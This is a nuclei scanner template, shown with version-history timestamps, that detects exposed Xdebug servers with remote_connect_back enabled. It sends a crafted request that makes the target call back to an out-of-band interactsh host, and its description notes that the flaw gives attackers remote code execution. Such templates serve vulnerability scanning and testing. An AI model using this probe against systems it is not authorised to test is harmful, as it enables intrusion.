nuclei-templates/vulnerabilities/php/php-xdebug-rce.yaml

38 lines
1.4 KiB
YAML
Raw Normal View History

2023-03-13 12:40:41 +00:00
id: php-xdebug-rce
info:
2023-03-16 21:01:48 +00:00
name: Xdebug remote code execution via xdebug.remote_connect_back
2023-03-13 12:40:41 +00:00
author: pwnhxl
severity: high
2023-03-16 21:01:48 +00:00
description: |
The XDebug extension <= v2.6.0 for PHP is designed to expand the debugging capabilities of developers, including the ability to perform remote debugging. A misconfigured server, with xdebug.remote_connect_back enabled, exposed to the internet could allow an unauthenticated remote attacker to trigger a debugging session using any IP via a simple web request. With a remote debugging session established, the attacker effectively has remote code execution (RCE) capabilities with which to establish persistence, exfiltrate data, or launch further attacks against the system or network.
2023-03-13 12:40:41 +00:00
reference:
- https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
- https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
- https://paper.seebug.org/397/
2023-03-16 21:01:48 +00:00
- https://github.com/D3Ext/XDEBUG-Exploit
tags: oast,rce,vulhub,php,debug,xdebug
2023-03-13 12:40:41 +00:00
requests:
- raw:
- |
GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: {{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: header
words:
- 'Set-Cookie: XDEBUG_SESSION={{randstr}}'
- type: status
status:
- 200